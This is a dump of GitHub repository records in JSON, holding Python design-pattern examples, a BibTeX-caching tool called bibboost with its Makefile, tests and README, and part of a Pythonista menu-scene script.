"max_line_length": 98,
"num_lines": 77,
"path": "/creational/factory_method.py",
"repo_name": "gamolyavlad/python_paterns",
"src_encoding": "UTF-8",
"text": "\"\"\"\nDefine an interface for creating an object , but let subclasses decide which class to instantiate.\nFactory Method lets a class defer instantiation to subclasses\n\"\"\"\n\n\nclass Genre(object):\n @staticmethod\n def factory(type):\n if type == \"Adventure\":\n return Adventure()\n elif type == \"Drama\":\n return Drama()\n raise Exception('invalid type {}'.format(type))\n\n\nclass Adventure(Genre):\n def drive(self):\n print(\"Adventure class\")\n\n\nclass Drama(Genre):\n def drive(self):\n print(\"Drana class.\")\n\n\"\"\"Example from book\"\"\"\n\n\nclass Culture:\n def __repr__(self):\n return self.__str__()\n\n\nclass Democracy(Culture):\n def __str__(self):\n return 'Democracy'\n\n\nclass Dictatorship(Culture):\n def __str__(self):\n return 'Dictatorship'\n\n\nclass Government:\n culture = ''\n\n def __str__(self):\n return self.culture.__str__()\n\n def __repr__(self):\n return self.culture.__repr__()\n\n def set_culture(self):\n raise AttributeError('Not Implemented Culture')\n\n\nclass GovernmentA(Government):\n def set_culture(self):\n self.culture = Democracy()\n\n\nclass GovernmentB(Government):\n def set_culture(self):\n self.culture = Dictatorship()\n\n\nif __name__ == \"__main__\":\n obj = Genre.factory(\"Adventure\")\n obj.drive()\n\n g1 = GovernmentA()\n g1.set_culture()\n print(str(g1))\n\n g2 = GovernmentB()\n g2.set_culture()\n print(str(g2))\n"
},
{
"alpha_fraction": 0.6414342522621155,
"alphanum_fraction": 0.6503984332084656,
"avg_line_length": 36.185184478759766,
"blob_id": "21933e5c431b6d24583333fa168b6276fec47f40",
"content_id": "f559befdf925f918567daed01d63e78d35030314",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1004,
"license_type": "no_license",
"max_line_length": 118,
"num_lines": 27,
"path": "/structural/flyweight.py",
"repo_name": "gamolyavlad/python_paterns",
"src_encoding": "UTF-8",
"text": "\"\"\"\n A flyweight is an object that minimizes memory use by sharing as much data as possible with other similar objects;\n it is a way to use objects in large numbers when a simple repeated representation would use an unacceptable amount of\n memory. Often some parts of the object state can be shared, and it is common practice to hold them in external data\n structures and pass them to the flyweight objects temporarily when they are used.\n\n Python has weakref module to create weak references to objects.\n\"\"\"\n\n\nclass Human(object):\n __slots__ = ['gender', 'age', 'first_name']\n\n def __init__(self, gender, age, first_name):\n self.gender = gender\n self.age = age\n self.first_name = first_name\n\n def info(self, id):\n return self.gender, self.age, self.first_name, id\n\n\nif __name__ == '__main__':\n assembly = [(1, Human('male', '12', 'John')),\n (2, Human('female', '32', 'Helen')),\n (3, Human('male', '43', 'Dave'))]\n print(assembly)\n"
},
{
"alpha_fraction": 0.6365145444869995,
"alphanum_fraction": 0.6365145444869995,
"avg_line_length": 23.59183692932129,
"blob_id": "3bd24f4fbedc01aab82e68624bfb1ecfaa7efd4a",
"content_id": "1688313922f0b9a140805d30990cf0c8826083c3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1205,
"license_type": "no_license",
"max_line_length": 113,
"num_lines": 49,
"path": "/structural/composite.py",
"repo_name": "gamolyavlad/python_paterns",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python\n\"\"\"\nCompose objects into tree structures to represent part-whole hierarchies. Composite lets clients treat individual\nobjects and compositions of objects uniformly.\n\"\"\"\n\n\nclass Component(object):\n def __init__(self, *args, **kw):\n pass\n\n def component_function(self):\n raise NotImplemented\n\n\nclass Leaf(Component):\n def __init__(self, *args, **kw):\n Component.__init__(self, *args, **kw)\n\n def component_function(self):\n print(\"component_function {}\".format(self))\n\n\nclass Composite(Component):\n def __init__(self, *args, **kw):\n Component.__init__(self, *args, **kw)\n self.children = []\n\n def append_child(self, child):\n self.children.append(child)\n\n def remove_child(self, child):\n self.children.remove(child)\n\n def component_function(self):\n [x.component_function() for x in self.children]\n\n\nif __name__ == \"__main__\":\n composite = Composite()\n l = Leaf()\n l_two = Leaf()\n l_three = Leaf()\n composite.append_child(l)\n print(composite.children)\n composite.append_child(l_two)\n composite.append_child(l_three)\n print(composite.children)\n composite.component_function()\n"
},
{
"alpha_fraction": 0.6873508095741272,
"alphanum_fraction": 0.6933174133300781,
"avg_line_length": 33.91666793823242,
"blob_id": "7b8c13508b4019aa0af52f059405284aa2276fa0",
"content_id": "afaee078938aa74f3544b1f0a89928d1832d0df4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 838,
"license_type": "no_license",
"max_line_length": 119,
"num_lines": 24,
"path": "/structural/bridge.py",
"repo_name": "gamolyavlad/python_paterns",
"src_encoding": "UTF-8",
"text": "\"\"\"\nThe bridge pattern is a design pattern used in software engineering which is meant to \"decouple an abstraction from its\nimplementation so that the two can vary independently\". The bridge uses encapsulation, aggregation, and can use\ninheritance to separate responsibilities into different classes.\n\"\"\"\nimport os\n\n\nclass FilePath(object):\n def create_file_path_1(self, dir_path, file_name):\n return os.path.join(dir_path, file_name)\n\n\nclass Bridge(object):\n def __init__(self):\n self.implem = FilePath()\n\n def create_file_path_2(self, dir_path, file_name, extenstion):\n return self.implem.create_file_path_1(dir_path, file_name + \".\" + extenstion)\n\n\nif __name__ == '__main__':\n print(FilePath().create_file_path_1('/tmp/', 'filename'))\n print(Bridge().create_file_path_2('/tmp/', 'filename', 'jpg'))\n"
},
{
"alpha_fraction": 0.5876288414001465,
"alphanum_fraction": 0.5876288414001465,
"avg_line_length": 21.823530197143555,
"blob_id": "6b11d546ac5c9f81cd67f69abc65ca5c83996955",
"content_id": "d779bbe1872c5addcb4b428936ecbeb3ea697766",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 776,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 34,
"path": "/creational/prototype.py",
"repo_name": "gamolyavlad/python_paterns",
"src_encoding": "UTF-8",
"text": "from copy import deepcopy\n\n\nclass Product(object):\n def __init__(self, name):\n self.name = name\n\n def get_name(self):\n return self.name\n\n\nclass Shop(object):\n \"\"\"Prototype class.\"\"\"\n def __init__(self):\n self._product = {}\n\n def register_product(self, product_name, product_obj):\n self._product[product_name] = product_obj\n\n def unregister_product(self, name):\n del self._product[name]\n\n def clone(self, name, **attr):\n obj = deepcopy(self._product[name])\n obj.__dict__.update(attr)\n return obj\n\nif __name__ == \"__main__\":\n BestBye = Shop()\n phone = Product('phone')\n BestBye.register_object('phone', phone)\n print(BestBye._product)\n TV = BestBye.clone('LG', name='TV')\n print(TV)\n"
}
] | 12 |
mohammedindore53/testrepo
|
https://github.com/mohammedindore53/testrepo
|
b5cccd0e5615b31f79bf90e98f819e59f0e6e40d
|
565cec6aee30acaab66f3936dc7551eaebda819a
|
b132d11d1fb79686897e89b95e113dca8ae00b92
|
refs/heads/main
| 2023-04-01T01:27:53.730492 | 2021-03-30T21:32:45 | 2021-03-30T21:32:45 | 346,839,965 | 0 | 0 | null | 2021-03-11T21:14:56 | 2021-03-11T21:19:30 | 2021-03-11T23:03:44 |
Python
|
[
{
"alpha_fraction": 0.7580645084381104,
"alphanum_fraction": 0.7580645084381104,
"avg_line_length": 30,
"blob_id": "dbfcb2821869c509b78c745e02829af50b227776",
"content_id": "f2ede6bc26c498d5bda663f8d553dd3e67e331c9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 62,
"license_type": "no_license",
"max_line_length": 33,
"num_lines": 2,
"path": "/child.py",
"repo_name": "mohammedindore53/testrepo",
"src_encoding": "UTF-8",
"text": "# Creating a file in child branch\nprint(\"Inside child brach\")\n"
}
] | 1 |
fabrice102/bibboost
|
https://github.com/fabrice102/bibboost
|
be05477c93052a1f3d754c6577cdc5bffcbb20b7
|
8e29337918ddb3f6faf2c85e835a37ae16654ab6
|
1c39ca3e448b6afded4adc5cf77edd80329c54b7
|
refs/heads/master
| 2020-04-01T22:05:47.738120 | 2018-10-19T00:40:12 | 2018-10-19T00:40:12 | 153,691,482 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6512283682823181,
"alphanum_fraction": 0.6528393030166626,
"avg_line_length": 30.43037986755371,
"blob_id": "df347bcd7d8048c25102d933c33c28a261771aee",
"content_id": "94bf8bde52d33f6f1adca027d041b55d20129597",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2483,
"license_type": "no_license",
"max_line_length": 105,
"num_lines": 79,
"path": "/bibboost/__main__.py",
"repo_name": "fabrice102/bibboost",
"src_encoding": "UTF-8",
"text": "import argparse\nimport os\nimport logging\nimport subprocess\nimport sys\n\nfrom pybtex.utils import OrderedCaseInsensitiveDict\n\nimport bibboost.aux\nimport bibboost.cache\n\n\ndef run(aux_file, cache_file, bibboost_bib_file):\n \"\"\"\n This function assumes that we are in the folder of aux_file, and that aux_file is just a `basename`\n :param aux_file: the aux file the user want to process\n :param cache_file: the file in which the cache will be stored\n :param bibboost_bib_file: the file which contains the resulting bibtex entries\n :return:\n \"\"\"\n bib_files, citations = bibboost.aux.parse_aux_file(aux_file)\n\n with bibboost.cache.CacheBib(cache_file) as cache:\n cache.update_db(bib_files)\n used_entries = OrderedCaseInsensitiveDict(\n (key, entry) for key, entry in cache.get_entries(citations)\n )\n\n missed_entries = [key for key in citations if key not in used_entries]\n if len(missed_entries) > 0:\n logging.warning(\"missing entries: {}\".format(\", \".join(missed_entries)))\n\n with open(bibboost_bib_file, \"w\") as f:\n f.write(\"\"\"% This file is generated by bibboost\n% It should not be modified manually\n\n\n\"\"\")\n f.write(\"\\n\\n\".join(e for e in used_entries.itervalues()))\n\n bibboost.aux.change_bib_file(aux_file, bibboost_bib_file)\n\n\ndef main():\n logging.basicConfig(format='bibboost:%(levelname)s:%(message)s', level=logging.DEBUG)\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"auxfile\", metavar=\"file.aux\", type=str,\n help=\"aux file with or without .aux extension (example: `paper.aux`, `mypaper`)\")\n parser.add_argument(\"--run-bibtex\", action=\"store_true\", help=\"execute bibtex when done\")\n args = parser.parse_args()\n\n aux_file = args.auxfile\n if not aux_file.endswith(\".aux\"):\n aux_file += \".aux\"\n\n if not os.path.isfile(aux_file):\n logging.error(\"file `{}` does not exist\".format(aux_file))\n sys.exit(1)\n\n aux_dir = os.path.dirname(aux_file)\n aux_file = os.path.basename(aux_file)\n if aux_dir != \"\":\n os.chdir(aux_dir)\n\n # From now on, we are in the `aux file` directory\n\n cache_file = aux_file[:-4] + \".bibboost.cache\"\n bibboost_bib_file = aux_file[:-4] + \".bibboost.bib\"\n\n run(aux_file, cache_file, bibboost_bib_file)\n\n if args.run_bibtex:\n logging.info(\"run `bibtex {}`\".format(aux_file))\n subprocess.call([\"bibtex\", aux_file])\n\n\nif __name__ == \"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.683920681476593,
"alphanum_fraction": 0.691629946231842,
"avg_line_length": 23.513513565063477,
"blob_id": "7660882a794db7fee5bf956cc9c05e85d34cfa11",
"content_id": "5262cc78212f089699759b90dade50fe8203c241",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Makefile",
"length_bytes": 908,
"license_type": "no_license",
"max_line_length": 109,
"num_lines": 37,
"path": "/Makefile",
"repo_name": "fabrice102/bibboost",
"src_encoding": "UTF-8",
"text": ".PHONY: all clean mrproper test FORCE\n\nPYTHON3=python3\n\nall: build/bibboost.pyz\n\nbuild/bibboost.pyz: build/venv/bin/activate requirements.txt $(wildcard bibboost/*) $(wildcard bibboost/**/*)\n\tmkdir -p build/bibboost\n\tcp -R bibboost build/bibboost/bibboost\n\t\n\tset -e; \\\n\tsource build/venv/bin/activate; \\\n\tcd build; \\\n\tpython3 -m pip install -r ../requirements.txt -t bibboost; \\\n\trm -rf bibboost/pybtex/tests bibboost/*.dist-info; \\\n\tfind bibboost -name '__pycache__' -delete; \\\n\tfind bibboost -regex '.*\\.py[co]$$' -delete; \\\n\tpython3 -m zipapp bibboost -m \"bibboost.__main__:main\" -p \"/usr/bin/env python3\"\n\nbuild/venv/bin/activate:\n\tmkdir -p build\n\t$(PYTHON3) -m venv build/venv\n\t\n\tset -e; \\\n\tsource build/venv/bin/activate; \\\n\tpython3 -m pip install --upgrade pip\n\ntest:\n\tcd test && $(MAKE) test\n\nclean:\n\tcd test && $(MAKE) clean\n\trm -rf build/venv\n\trm -rf build/bibboost\n\nmrproper: clean\n\trm -rf build\n\n"
},
{
"alpha_fraction": 0.6758813858032227,
"alphanum_fraction": 0.6806890964508057,
"avg_line_length": 20.341880798339844,
"blob_id": "1f0e66c9fee58e64b5b8f2b8f8f4bc6d9786aadf",
"content_id": "f65d405c6565dd11500fea70528bb687181896ea",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 2496,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 117,
"path": "/test/test.bats",
"repo_name": "fabrice102/bibboost",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env bats\n\nclean() {\n make clean\n}\n\nsetup() {\n clean\n}\n\nteardown() {\n clean\n}\n\nload 'test_helper/bats-support/load'\nload 'test_helper/bats-assert/load'\n\n@test \"bibtex_micro\" {\n FILE=bibtex_micro\n\n run pdflatex $FILE.tex\n assert_success\n\n run python3 ../bibboost.py $FILE.aux\n assert_success\n assert_line 'bibboost:INFO:SQL cache database out of date. Recreating it...'\n\n run python3 ../bibboost.py $FILE\n assert_success\n assert_line 'bibboost:INFO:SQL cache database up to date'\n\n bibtex $FILE\n assert_success\n\n run pdflatex $FILE.tex\n assert_success\n}\n\n@test \"bibtex_micro --run-bibtex\" {\n FILE=bibtex_micro\n\n run pdflatex $FILE.tex\n assert_success\n\n run python3 ../bibboost.py --run-bibtex $FILE.aux\n assert_success\n assert_line 'bibboost:INFO:SQL cache database out of date. Recreating it...'\n\n run python3 ../bibboost.py $FILE\n assert_success\n assert_line 'bibboost:INFO:SQL cache database up to date'\n\n run pdflatex $FILE.tex\n assert_success\n}\n\n@test \"bibtex_micro_missing\" {\n FILE=bibtex_micro_missing\n\n run pdflatex $FILE.tex\n assert_success\n\n run python3 ../bibboost.py $FILE\n assert_success\n assert_line 'bibboost:INFO:SQL cache database out of date. Recreating it...'\n assert_line 'bibboost:WARNING:missing entries: missing'\n\n run python3 ../bibboost.py $FILE\n assert_success\n assert_line 'bibboost:INFO:SQL cache database up to date'\n assert_line 'bibboost:WARNING:missing entries: missing'\n\n bibtex $FILE\n assert_success\n\n run pdflatex $FILE.tex\n assert_success\n}\n\n@test \"bibtex_large\" {\n FILE=bibtex_large\n\n run pdflatex $FILE.tex\n assert_success\n\n run python3 ../bibboost.py $FILE.aux\n assert_success\n assert_line 'bibboost:INFO:SQL cache database out of date. Recreating it...'\n\n run python3 ../bibboost.py $FILE\n assert_success\n assert_line 'bibboost:INFO:SQL cache database up to date'\n\n bibtex $FILE\n assert_success\n\n run pdflatex $FILE.tex\n assert_success\n}\n\n@test \"bibtex_micro pypy3 (requires pypy3 installed)\" {\n FILE=bibtex_micro\n\n run pdflatex $FILE.tex\n assert_success\n\n run pypy3 ../bibboost.py --run-bibtex $FILE.aux\n assert_success\n assert_line 'bibboost:INFO:SQL cache database out of date. Recreating it...'\n\n run pypy3 ../bibboost.py $FILE\n assert_success\n assert_line 'bibboost:INFO:SQL cache database up to date'\n\n run pdflatex $FILE.tex\n assert_success\n}"
},
{
"alpha_fraction": 0.6781609058380127,
"alphanum_fraction": 0.6896551847457886,
"avg_line_length": 16.600000381469727,
"blob_id": "02849a5f8d3572aeddfd2f6a94ed644d302c19dd",
"content_id": "f7cb208da937a1fef68ae942b8e077def9074c68",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 87,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 5,
"path": "/bibboost.py",
"repo_name": "fabrice102/bibboost",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n\nimport runpy\n\nrunpy.run_module(\"bibboost\", run_name=\"__main__\")"
},
{
"alpha_fraction": 0.5343202948570251,
"alphanum_fraction": 0.5343202948570251,
"avg_line_length": 31.794116973876953,
"blob_id": "862dbdc007acd37924d913bb2d5d49dd1809493a",
"content_id": "7657e90afaf35949fceeb6e9b5cb619f38ef7567",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2229,
"license_type": "no_license",
"max_line_length": 114,
"num_lines": 68,
"path": "/bibboost/aux.py",
"repo_name": "fabrice102/bibboost",
"src_encoding": "UTF-8",
"text": "import re\nimport fileinput\n\n\ndef get_canonical_bib_file(name: str) -> str:\n name = name.strip()\n if not name.endswith(\".bib\"):\n name += \".bib\"\n return name\n\n\n_citation_re = re.compile(r\"^\\\\citation\\{(?P<key>[^\\}]+)\\}$\")\n_bib_files_re = re.compile(r\"^\\\\bibdata\\{(?P<files>[^}]+)\\}$\")\n_bibboost_bib_files_re = re.compile(r\"^%\\\\bibboostdata\\{(?P<files>[^}]+)\\}$\")\n\n\ndef parse_aux_file(aux_file_name):\n with open(aux_file_name) as f:\n citations = []\n bib_files = []\n bibboost = False # True, if bibboost was actually used\n\n for line in f:\n p = _citation_re.match(line)\n if p is not None:\n citations.append(p.group(\"key\"))\n continue\n\n p = _bibboost_bib_files_re.match(line)\n if p is not None:\n if bib_files:\n raise ValueError(\"\\\\bibboostdata present twice in aux file or present after \\\\bibdata.\")\n bib_files = p.group(\"files\").split(\",\")\n bibboost = True\n\n p = _bib_files_re.match(line)\n if (p is not None) and not bibboost:\n if bib_files:\n raise ValueError(\"\\\\bibdata present twice in aux file. bibboost only supports one \\\\bibdata.\")\n bib_files = p.group(\"files\").split(\",\")\n\n bib_files = [get_canonical_bib_file(name) for name in bib_files]\n\n return bib_files, citations\n\n\ndef change_bib_file(aux_file_name, bib_file_name):\n \"\"\"\n Change the bib files used in `aux_file_name` into `bib_file_name`\n and replace the line `\\bibdata` into `%\\bibboostdata`\n :param aux_file_name:\n :param bib_file_name:\n :return:\n \"\"\"\n with fileinput.FileInput(aux_file_name, inplace=True) as f:\n bibboost = False\n for line in f:\n p = _bibboost_bib_files_re.match(line)\n if p is not None:\n bibboost = True\n\n p = _bib_files_re.match(line)\n if p is not None:\n if not bibboost:\n print(line.replace(\"\\\\bibdata\", \"%\\\\bibboostdata\"), end=\"\")\n print(\"\\\\bibdata{{{}}}\".format(bib_file_name))\n else:\n print(line, end=\"\")"
},
{
"alpha_fraction": 0.6101694703102112,
"alphanum_fraction": 0.6101694703102112,
"avg_line_length": 12.222222328186035,
"blob_id": "4925d4a3bc55db0a397ebfe7bf86252969645977",
"content_id": "908e7ff8f1f8db034031f526bc078131363cd55c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Makefile",
"length_bytes": 118,
"license_type": "no_license",
"max_line_length": 54,
"num_lines": 9,
"path": "/test/Makefile",
"repo_name": "fabrice102/bibboost",
"src_encoding": "UTF-8",
"text": ".PHONY: clean test\n\nBATS=bats\n\ntest:\n\t$(BATS) test.bats\n\nclean:\n\trm -f *.blg *.aux *.bbk *.bibboost* *.log *.pdf *.bbl"
},
{
"alpha_fraction": 0.7401241660118103,
"alphanum_fraction": 0.7452031373977661,
"avg_line_length": 31.227272033691406,
"blob_id": "4785f7629cc4db9745e621417146436dc6f3a01b",
"content_id": "c1911ebde298e9ef58af66758c30ad31071db26c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 3544,
"license_type": "no_license",
"max_line_length": 256,
"num_lines": 110,
"path": "/README.md",
"repo_name": "fabrice102/bibboost",
"src_encoding": "UTF-8",
"text": "# BibBoost: Caching Bib Files for BibTeX\n\nBibBoost automatically extracts entries from LaTeX `aux` files and caches large `bib` files automatically into a `sqlite3` database, in order to significantly speed up the generation of the bibliography.\n\n*Warning:* The software is an alpha software. It has only be tested on very simple LaTeX / BibTeX examples and might fail on more complex examples.\n\n*Warning:* THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED.\n\n### Requirements\n\nTo use BibBoost from the Git sources:\n\n- `python3` required\n- packages specified in `requirements.txt`: `python3 -m pip install -r requirements.txt`\n- `pypy3` optional but recommended\n\nTo use the standalone BibBoost (see the Standalone Application section):\n\n- `python3` required\n- `pypy3` optional but recommended\n\nFor development, testing, generation of the standalone version, in addition to all the above:\n\n- `pypy3` required\n- `virtualenv` required: `python3 -m pip install virtualenv`\n- `bats` <https://github.com/sstephenson/bats>\n- running `git submodule update --init`\n\n### Getting Started\n\nBibBoost can be used as a drop-in replacement for BibTex.\nInstead of running\n\n bibtex mylatexfile.aux\n\nyou can run\n\n python3 bibboost.py mylatexfile.aux\n bibtex mylatexfile.aux\n\nor\n\n python3 bibboost.py --run-bibtex mylatexfile.aux\n\nor (recommended if `pypy3` is installed)\n\n pypy3 bibboost.py mylatexfile.aux\n bibtex mylatexfile.aux\n\nor\n\n pypy3 bibboost.py --run-bibtex mylatexfile.aux\n \nThe first execution after any change to any `bib` file might be slow as the database `mylatexfile.bibboost.cache` needs to be created.\nSubsequent executions should be much faster (assuming the number of citations in the LaTeX file is much smaller than the number of entries in the bib files).\n\n### FAQ\n\n#### How Does it Work?\n\nBibBoost reads the `aux` file to find the list of `bib` files used.\nThe first time BibBoost is used or after any modification of the `bib` files (including the order of files, as BibTeX is sensitive to order), BibBoost parses the `bib` files and store each BibTeX entry into a `sqlite3` database `<aux file>.bibboost.cache`.\nChanges of `bib` files are detected using the date of last modification.\n\nThen, BibBoost, extracts from the `sqlite3` database the entries used in the `aux` file into the file `<aux file>.bibboost.bib`.\n\nFinally, it modifies the the `aux` file to point to `<aux file>.bibboost.bib` instead of the original `bib` files (it also adds a special line in the `<aux file>` to remember the original `bib` files for future execution).\n\nIf the option `--run-bibtex` is given, BibBoost automatically runs `bibtex`.\n\n#### What Should I Do with the `*.bibboost*` files?\n\n`*.bibboost*` files are similar to `*.aux`, `*.log`, ...\nThese files should *not* be committed on a Git folder.\n\n#### Nothing is Working. 
What Should I Do?\n\nStart by removing all the `*.bibboost*` files.\n\n#### Is `Biber`, `natbib`, `biblatex`, ...?\n\nThis is an early alpha software.\nNone of these configurations have been tested.\n\n#### Is `nocite{*}` Supported?\n\nNo and we do not plan to support it as it completely defeats the purpose of BibBoost.\n\n### Standalone Application\n\nFor easy distribution, it is possible to generate a standalone application by running:\n\n make\n\nThe resulting application is generated in `build/bibboost.pyz`.\nIt only requires `python3` to run correctly.\nIt can then be used as:\n\n python3 bibboost.pyz\n\nor (recommended)\n\n pypy3 bibboost.pyz\n\n\n### Testing\n\nRun\n\n make test"
},
{
"alpha_fraction": 0.5577725172042847,
"alphanum_fraction": 0.5588608980178833,
"avg_line_length": 28.961956024169922,
"blob_id": "b5397beab4d14f2456824191782bfee0f6298866",
"content_id": "6277734f3d12b336cb3861c26df13fef62c1032c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5513,
"license_type": "no_license",
"max_line_length": 112,
"num_lines": 184,
"path": "/bibboost/cache.py",
"repo_name": "fabrice102/bibboost",
"src_encoding": "UTF-8",
"text": "import io\nimport logging\nimport os\nimport sqlite3\n\nimport pybtex.database.input.bibtex\nimport pybtex.database.output.bibtex\nimport pybtex.database\nfrom pybtex.utils import OrderedCaseInsensitiveDict\n\n\nclass FastWriter(pybtex.database.output.bibtex.Writer):\n \"\"\"\n A version of bibtex Writer which bypass some slow operations\n knowing that the entries we are using are well-formed\n (might create bugs... not completely checked)\n \"\"\"\n\n def _encode(self, s):\n return s # bypass encoding, as encoding is very slow and normally we don't have issues with encoding\n\n def check_braces(self, s):\n return # bypass checking braces\n\n def write_entry_stream(self, key, entry, stream):\n stream.write('@%s' % entry.original_type)\n stream.write('{%s' % key)\n for role, persons in entry.persons.items():\n self._write_persons(stream, persons, role)\n for type, value in entry.fields.items():\n self._write_field(stream, type, value)\n stream.write('\\n}\\n')\n\n def entry_to_string(self, key, entry):\n stream = io.StringIO() if self.unicode_io else io.BytesIO()\n self.write_entry_stream(key, entry, stream)\n return stream.getvalue()\n\n\nclass CacheBib:\n def _create_tables(self):\n self.con.execute(\"\"\"CREATE TABLE IF NOT EXISTS bib_file (\n id INTEGER PRIMARY KEY ASC, /* must be 0,1,2,3, ... in order of inclusion */\n name TEXT NOT NULL,\n timestamp INTEGER NOT NULL\n );\"\"\")\n self.con.execute(\"\"\"CREATE TABLE IF NOT EXISTS entry (\n key TEXT NOT NULL PRIMARY KEY,\n entry TEXT NOT NULL/*,\n bib_file_id INTEGER NOT NULL,\n FOREIGN KEY(bib_file_id) REFERENCES bib_file(id) ON DELETE CASCADE */\n );\"\"\")\n self.con.commit()\n\n def __init__(self, filename):\n self.con = sqlite3.connect(filename)\n self._create_tables()\n\n self.bibtex_writer = FastWriter()\n\n def __enter__(self):\n return self\n\n def __exit__(self, type, value, tb):\n self.close()\n\n def close(self):\n self.con.close()\n\n def is_db_up_to_date(self, bib_files):\n \"\"\"\n Check whether the database contains exactly the current bib_files\n :param bib_files:\n :return:\n \"\"\"\n\n t = [\n (i, name, os.path.getmtime(name))\n for i, name in enumerate(bib_files)\n ]\n return self.con.execute(\"\"\"SELECT id, name, `timestamp` FROM bib_file;\"\"\").fetchall() == t\n\n def update_db(self, bib_files):\n \"\"\"\n Update the database to match the bib_files\n If name/order/timestamp do not match, the database is re-created\n :param bib_files: ordered list of bibtex files\n :return:\n \"\"\"\n\n if self.is_db_up_to_date(bib_files):\n logging.info(\"SQL cache database up to date\")\n return\n\n logging.info(\"SQL cache database out of date. 
Recreating it...\")\n\n # Remove everything\n self.con.execute(\"DROP TABLE bib_file;\")\n self.con.execute(\"DROP TABLE entry;\")\n self._create_tables()\n\n # and add back files and entries\n self.add_bib_files_with_entries(bib_files)\n self.con.commit()\n\n def get_entries(self, keys):\n \"\"\"\n\n :param keys:\n :return: an array of tuple (key, entry) of found entries\n \"\"\"\n\n return self.con.execute(\n \"\"\"SELECT `key`, `entry` FROM entry WHERE `key` in ({})\"\"\".format(\",\".join([\"?\"] * len(keys))), keys\n ).fetchall()\n\n def gen_entry_bibtex(self, key, entry):\n \"\"\"\n Return the bibtex corresponding to an entry\n :param entry:\n :return:\n \"\"\"\n\n return self.bibtex_writer.entry_to_string(key, entry)\n\n def add_bib_files_with_entries(self, bib_files):\n \"\"\"\n\n Does not commit the transaction\n :param bib_files:\n :return:\n \"\"\"\n\n # person_fields = [] so that pybtex does not try parsing persons\n bib_parser = pybtex.database.input.bibtex.Parser(person_fields=[])\n bib_data = None\n for (i, bib_file) in enumerate(bib_files):\n self.add_bib_file(i, bib_file)\n bib_data = bib_parser.parse_file(bib_file)\n\n entries = [(key, self.gen_entry_bibtex(key, entry)) for key, entry in bib_data.entries.items()]\n\n self.add_entries(entries)\n\n def add_bib_file(self, bib_file_id, file_name):\n \"\"\"\n Does not add entries\n Does not commit the transaction\n Does not add the corresponding entries\n :param bib_file_id:\n :param file_name:\n :return:\n \"\"\"\n timestamp = os.path.getmtime(file_name)\n self.con.execute(\"\"\"INSERT INTO bib_file (\n id,\n name,\n `timestamp`\n )\n VALUES (\n ?,\n ?,\n ?\n );\n \"\"\",\n (bib_file_id, file_name, timestamp))\n\n def add_entries(self, entries):\n \"\"\"\n Throws an error if an entry is already present.\n Does not commit the transaction.\n :param entries: list of pairs (key, entry), where entry is a Bibtex string\n :return:\n \"\"\"\n self.con.executemany(\"\"\"INSERT INTO entry (\n key,\n entry\n )\n VALUES (\n ?,\n ?\n ); \n \"\"\",\n entries)\n"
}
] | 8 |
Kieranhak/old-sjk-game
|
https://github.com/Kieranhak/old-sjk-game
|
44ce2bfdccac2414b1f269758353ca5a46b6ca49
|
4211b13a4bce9acc475953d4281dca1716a1d9ec
|
55d54df62c09530130a02c82a4afefb715d16a26
|
refs/heads/master
| 2021-08-29T16:36:46.271751 | 2017-12-14T10:01:15 | 2017-12-14T10:01:15 | 114,233,790 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5096081495285034,
"alphanum_fraction": 0.5288243889808655,
"avg_line_length": 36.11888122558594,
"blob_id": "f09ca923c6580bc46707e7e8cdc8f761831220ba",
"content_id": "65b3d6dd4347b29a8d824a138c85734229bc46be",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5308,
"license_type": "no_license",
"max_line_length": 145,
"num_lines": 143,
"path": "/README.md",
"repo_name": "Kieranhak/old-sjk-game",
"src_encoding": "UTF-8",
"text": "from time import sleep\nfrom scene import *\nimport ui\nimport sound\nA = Action\n\nclass ButtonNode (SpriteNode):\n\tdef __init__(self, title, *args, **kwargs):\n\t\tSpriteNode.__init__(self, 'pzl:Button1', *args, **kwargs)\n\t\tbutton_font = ('Avenir Next', 20)\n\t\tself.title_label = LabelNode(title, font=button_font, color='black', position=(0, 1), parent=self)\n\t\tself.title = title\n\nclass MenuScene (Scene):\n\tdef __init__(self, title, subtitle, button_titles):\n\t\tScene.__init__(self)\n\t\tself.title = title\n\t\tself.subtitle = subtitle\n\t\tself.button_titles = button_titles\n\t\t\n\tdef setup(self):\n\t\tbutton_font = ('Avenir Next', 20)\n\t\ttitle_font = ('Avenir Next', 36)\n\t\tnum_buttons = len(self.button_titles)\n\t\tself.bg = SpriteNode(color='black', parent=self)\n\t\tbg_shape = ui.Path.rounded_rect(0, 0, 240, num_buttons * 64 + 140, 8)\n\t\tbg_shape.line_width = 4\n\t\tshadow = ((0, 0, 0, 0.35), 0, 0, 24)\n\t\tself.menu_bg = ShapeNode(bg_shape, (1,1,1,0.9), '#15a4ff', 